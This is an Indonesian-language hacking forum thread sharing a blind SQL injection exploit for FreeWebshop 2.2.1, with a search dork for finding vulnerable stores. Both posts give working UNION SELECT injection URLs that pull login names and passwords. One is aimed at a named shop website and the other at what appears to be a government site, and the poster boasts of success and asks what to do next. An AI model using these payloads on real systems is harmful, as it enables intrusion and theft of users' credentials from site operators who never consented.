FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Topik sebelumnya Topik selanjutnya Go down

FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Post by juniorsev3n on Thu Feb 21, 2008 4:17 pm

google dork: "Powered by FreeWebshop.org 2.2.1"
contohwebsite: http://www.atelierinderoos.nl/
bug: index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

====
jadi
http://www.atelierinderoos.nl/index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

===
keterangan lengkap di
http://milw0rm.com/exploits/4740

maap bug lama tapi enak ni blind sql injection
===
selamat mencoba
avatar
juniorsev3n
Archxecutor

Jumlah posting : 145
Age : 23
Location : Bandung Underground
Registration date : 23.01.08

Lihat profil user http://juniorsev3n.co.cc

Kembali Ke Atas Go down

Re: FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Post by juniorsev3n on Thu Feb 21, 2008 4:52 pm

aduh
aura cms
dapet euy

http://www.banjar-jabar.go.id/redesign/index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*

situs pemerintah tuh?
mau diapain>
avatar
juniorsev3n
Archxecutor

Jumlah posting : 145
Age : 23
Location : Bandung Underground
Registration date : 23.01.08

Lihat profil user http://juniorsev3n.co.cc

Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas


 
Permissions in this forum:
Anda tidak dapat menjawab topik